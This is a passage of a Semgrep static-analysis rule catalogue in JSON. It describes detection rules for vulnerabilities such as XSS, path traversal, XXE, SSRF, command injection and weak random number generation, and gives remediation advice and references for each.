Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-empty-password.gorm-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"help":{"markdown":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js)\n - [https://golang.org/pkg/html/template/#JS](https://golang.org/pkg/html/template/#JS)\n","text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","id":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","name":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","id":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","name":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-pickleshare-django.tainted-pickleshare-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"help":{"markdown":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks](https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key)\n","text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","id":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","name":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"help":{"markdown":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string](https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string)\n","text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","id":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","name":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","id":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","name":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","id":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","name":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"help":{"markdown":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf","id":"javascript.express.security.audit.express-ssrf.express-ssrf","name":"javascript.express.security.audit.express-ssrf.express-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-ssrf.express-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"setMultipleAllowances() is missing onlyOwner modifier"},"help":{"markdown":"setMultipleAllowances() is missing onlyOwner modifier\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control)\n - [https://twitter.com/danielvf/status/1494317265835147272](https://twitter.com/danielvf/status/1494317265835147272)\n - [https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8](https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8)\n - [https://play.secdim.com/game/dapp/challenge/rigoownsol](https://play.secdim.com/game/dapp/challenge/rigoownsol)\n","text":"setMultipleAllowances() is missing onlyOwner modifier"},"helpUri":"https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","id":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","name":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"help":{"markdown":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","id":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","name":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-href-url.react-href-url)\n - [https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts](https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"helpUri":"https://semgrep.dev/r/typescript.react.react-href-url.react-href-url","id":"typescript.react.react-href-url.react-href-url","name":"typescript.react.react-href-url.react-href-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-href-url.react-href-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request)\n - [https://godoc.org/github.com/dghubble/sling#Sling.Add](https://godoc.org/github.com/dghubble/sling#Sling.Add)\n - [https://github.com/dghubble/sling](https://github.com/dghubble/sling)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","id":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","name":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"help":{"markdown":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"helpUri":"https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","id":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","name":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","properties":{"precision":"very-high","tags":["CWE-300: Channel Accessible by Non-Endpoint","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - 